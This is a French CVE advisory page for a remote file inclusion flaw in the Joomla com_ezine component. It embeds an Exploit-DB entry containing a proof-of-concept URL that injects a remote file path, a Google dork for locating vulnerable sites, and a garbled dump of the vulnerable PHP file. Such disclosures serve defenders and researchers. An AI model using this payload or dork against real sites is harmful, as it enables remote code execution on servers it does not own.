CVE-2009-4094 : Détail

CVE-2009-4094

Code Injection
A03-Injection
2.62%V3
Network
2009-11-27
19h45 +00:00
2017-08-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

PHP remote file inclusion vulnerability in class/php/d4m_ajax_pagenav.php in the D4J eZine (com_ezine) component 2.1 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[mosConfig_absolute_path parameter.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 10178

Date de publication : 2009-10-19 22h00 +00:00
Auteur : kaMtiEz
EDB Vérifié : Yes

##################################################################################################### ## Joomla / Mambo Component com_ezine Remote File Include vulnerability ## ## Author : kaMtiEz (kamzcrew@yahoo.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : October 20 2009 ## ##################################################################################################### # Hello My Name Is : ## # __ _____ __ ._____________ ## # | | _______ / \_/ |_|__\_ _____/_______ ## # | |/ /\__ \ / \ / \ __\ || __)_\___ / ## # | < / __ \_/ Y \ | | || \/ / ## # |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ## # \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ## ##################################################################################################### [ Software Information ] [+] Vendor : http://designformamb0.c0m [+] Download : - [+] version : 2.1 [+] Vulnerability : RFI [+] price : FREE [+] Dork : inurl:"com_ezine" [+] Location : INDONESIA [DESCRIPTION] /** * eZine component v2.1 * * @copyright Nguyen Manh Cuong * Author`s email : cu0ngnm@designformamb0.c0m * Author`s hompage : http://designformamb0.c0m * * @license Commercial Product - Single Site License or Free to Use with Limitation **/ ############################################### [ PoC ] http://server/components/com_ezine/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L] [ Bugs File ] [+] d4m_ajax_pagenav.php total / $this->limit ); $this_page = ceil( ($this->limitstart+1) / $this->limit ); $start_loop = (floor(($this_page-1)/$displayed_pages))*$displayed_pages+1; if ($start_loop + $displayed_pages - 1 1) { $page = ($this_page - 2) * $this->limit; $txt .= '<< '. _PN_START .' '; $txt .= '< '. _PN_PREVIOUS .' '; } else { $txt .= '<< '. _PN_START .' '; $txt .= '< '. _PN_PREVIOUS .' '; } for ($i=$start_loop; $i limit; if ($i == $this_page) { $txt .= ''. $i .' '; } else { $txt .= ''. $i .' '; } } if ($this_page limit; $end_page = ($total_pages-1) * $this->limit; $txt .= ''. _PN_NEXT .' > '; $txt .= ''. _PN_END .' >>'; } else { $txt .= ''. _PN_NEXT .' > '; $txt .= ''. _PN_END .' >>'; } return $txt; } } ?> [ FIX ] Tukulesto said : talk to Aurakasih .. lol kaMtiEz said : tanya ama AuraKasih .. hha M3Nw5 said : takon Karo AuraKasih .. hha Arianom Said : coba kau tanya aura kasih lae Joke.. ;) ############################################### [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW [+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h [+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz [+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!! [ NOTE ] [+] makasih buad babe and enyak .... muach .. untuk pacarkuwh luph u mwahhhhh [+] makasih buat om tukulesto buat perl exploit nye .. huahhh [+] aurakasih .. sekarang pilih antara kaMtiEz . Tukulesto . M3NW5 ... hha [+] om tukulesto kutunggu kau di kotaku .. :D -----------------------------------------------------------------]

Products Mentioned

Configuraton 0

Joomla>>Joomla\! >> Version *

Designforjoomla>>Com_ezine >> Version 2.1

    Références

    http://www.securityfocus.com/bid/37043
    Tags : vdb-entry, x_refsource_BID